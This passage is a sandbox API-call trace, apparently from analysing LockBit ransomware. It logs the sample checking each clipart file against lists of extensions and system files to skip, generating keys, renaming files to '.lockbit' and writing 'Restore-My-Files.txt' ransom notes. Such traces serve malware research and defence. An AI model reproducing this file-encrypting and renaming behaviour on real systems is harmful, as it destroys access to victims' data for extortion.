lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.860] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0180.860] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0180.860] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0180.861] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0180.861] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01740_.GIF") returned -1 [0180.861] lstrcmpiW (lpString1="ntldr", lpString2="WB01740_.GIF") returned -1 [0180.861] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01740_.GIF") returned -1 [0180.861] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01740_.GIF") returned -1 [0180.861] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01740_.GIF") returned -1 [0180.861] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01740_.GIF") returned -1 [0180.861] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01740_.GIF") returned -1 [0180.861] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0180.861] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01740_.GIF") returned=".GIF" [0180.861] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0180.861] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0180.861] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0180.861] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0180.861] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0180.861] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0180.861] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0180.861] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0180.861] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0180.861] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0180.861] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0180.861] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0180.861] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0180.862] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0180.862] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0180.862] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0180.862] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0180.862] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0180.862] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0180.862] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0180.862] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0180.862] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0180.862] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0180.862] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0180.862] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0180.862] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0180.862] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0180.862] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0180.862] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01740_.GIF.lockbit") returned 72 [0180.862] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01740_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01740_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0180.864] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0180.864] malloc (_Size=0x40068) returned 0x1ff1e60 [0180.864] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=707) returned 1 [0180.864] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.864] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0180.864] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.865] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0180.865] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0180.870] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01740_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01740_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0180.870] malloc (_Size=0xa6) returned 0x1fa2ed8 [0180.870] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0180.870] free (_Block=0x1fa2ed8) [0180.871] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01740_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0180.871] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0180.871] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0180.871] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49077500, ftCreationTime.dwHighDateTime=0x1bd4e69, ftLastAccessTime.dwLowDateTime=0x5e574fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x49077500, ftLastWriteTime.dwHighDateTime=0x1bd4e69, nFileSizeHigh=0x0, nFileSizeLow=0x253, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01742_.GIF", cAlternateFileName="")) returned 1 [0180.871] lstrcmpiW (lpString1=".", lpString2="WB01742_.GIF") returned -1 [0180.871] lstrcmpiW (lpString1="..", lpString2="WB01742_.GIF") returned -1 [0180.871] PathFindExtensionW (pszPath="WB01742_.GIF") returned=".GIF" [0180.871] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0180.871] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0180.871] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0180.871] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0180.871] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0180.871] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0180.871] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0180.871] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0180.871] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0180.871] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0180.871] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0180.871] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0180.872] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0180.872] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0180.872] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0180.872] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0180.872] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0180.872] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0180.872] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0180.872] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0180.872] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0180.872] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0180.872] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0180.872] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0180.872] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.872] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0180.872] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0180.872] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0180.872] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0180.872] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0180.872] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0180.872] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0180.872] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0180.873] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0180.873] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0180.873] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0180.873] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0180.873] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0180.873] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0180.873] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0180.873] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0180.873] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0180.873] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.873] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0180.873] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0180.873] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0180.873] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0180.873] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01742_.GIF") returned -1 [0180.873] lstrcmpiW (lpString1="ntldr", lpString2="WB01742_.GIF") returned -1 [0180.873] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01742_.GIF") returned -1 [0180.873] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01742_.GIF") returned -1 [0180.873] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01742_.GIF") returned -1 [0180.873] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01742_.GIF") returned -1 [0180.873] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01742_.GIF") returned -1 [0180.873] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0180.874] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01742_.GIF") returned=".GIF" [0180.874] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0180.874] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0180.874] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0180.874] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0180.874] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0180.874] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0180.874] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0180.874] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0180.874] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0180.874] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0180.874] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0180.874] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0180.874] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0180.874] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0180.874] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0180.874] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0180.874] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0180.874] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0180.874] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0180.874] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0180.874] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0180.875] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0180.875] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0180.875] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0180.875] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0180.875] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0180.875] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0180.875] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0180.875] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01742_.GIF.lockbit") returned 72 [0180.875] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01742_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01742_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0180.877] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0180.877] malloc (_Size=0x40068) returned 0x1ff1e60 [0180.877] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=595) returned 1 [0180.877] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.877] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0180.878] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.878] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0180.878] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0180.883] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01742_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01742_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0180.883] malloc (_Size=0xa6) returned 0x1fa2ed8 [0180.883] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0180.883] free (_Block=0x1fa2ed8) [0180.883] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01742_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0180.883] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0180.883] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0180.883] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47d64800, ftCreationTime.dwHighDateTime=0x1bd4e69, ftLastAccessTime.dwLowDateTime=0x5e59b110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x47d64800, ftLastWriteTime.dwHighDateTime=0x1bd4e69, nFileSizeHigh=0x0, nFileSizeLow=0x4d5, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01743_.GIF", cAlternateFileName="")) returned 1 [0180.883] lstrcmpiW (lpString1=".", lpString2="WB01743_.GIF") returned -1 [0180.884] lstrcmpiW (lpString1="..", lpString2="WB01743_.GIF") returned -1 [0180.884] PathFindExtensionW (pszPath="WB01743_.GIF") returned=".GIF" [0180.884] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0180.884] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0180.884] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0180.884] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0180.884] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0180.884] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0180.884] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0180.884] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0180.884] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0180.884] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0180.884] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0180.884] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0180.884] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0180.884] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0180.884] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0180.884] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0180.884] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0180.884] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0180.884] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0180.884] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0180.884] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0180.884] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0180.885] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0180.885] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0180.885] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.885] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0180.885] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0180.885] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0180.885] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0180.885] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0180.885] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0180.885] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0180.885] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0180.885] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0180.885] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0180.885] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0180.885] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0180.885] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0180.885] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0180.885] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0180.885] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0180.885] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0180.885] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.885] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0180.885] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0180.886] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0180.886] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0180.886] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01743_.GIF") returned -1 [0180.886] lstrcmpiW (lpString1="ntldr", lpString2="WB01743_.GIF") returned -1 [0180.886] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01743_.GIF") returned -1 [0180.886] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01743_.GIF") returned -1 [0180.886] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01743_.GIF") returned -1 [0180.886] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01743_.GIF") returned -1 [0180.886] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01743_.GIF") returned -1 [0180.886] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0180.886] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01743_.GIF") returned=".GIF" [0180.886] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0180.886] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0180.886] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0180.886] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0180.886] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0180.886] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0180.886] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0180.886] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0180.886] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0180.886] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0180.886] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0180.886] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0180.886] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0180.887] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0180.887] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0180.887] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0180.887] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0180.887] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0180.887] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0180.887] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0180.887] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0180.887] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0180.887] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0180.887] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0180.887] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0180.887] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0180.887] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0180.887] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0180.887] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01743_.GIF.lockbit") returned 72 [0180.887] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01743_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01743_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0180.889] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0180.889] malloc (_Size=0x40068) returned 0x1ff1e60 [0180.889] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1237) returned 1 [0180.889] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.890] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0180.890] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.890] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0180.890] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0180.895] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01743_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01743_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0180.896] malloc (_Size=0xa6) returned 0x1fa2ed8 [0180.896] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0180.897] free (_Block=0x1fa2ed8) [0180.897] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01743_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0180.897] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0180.897] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: 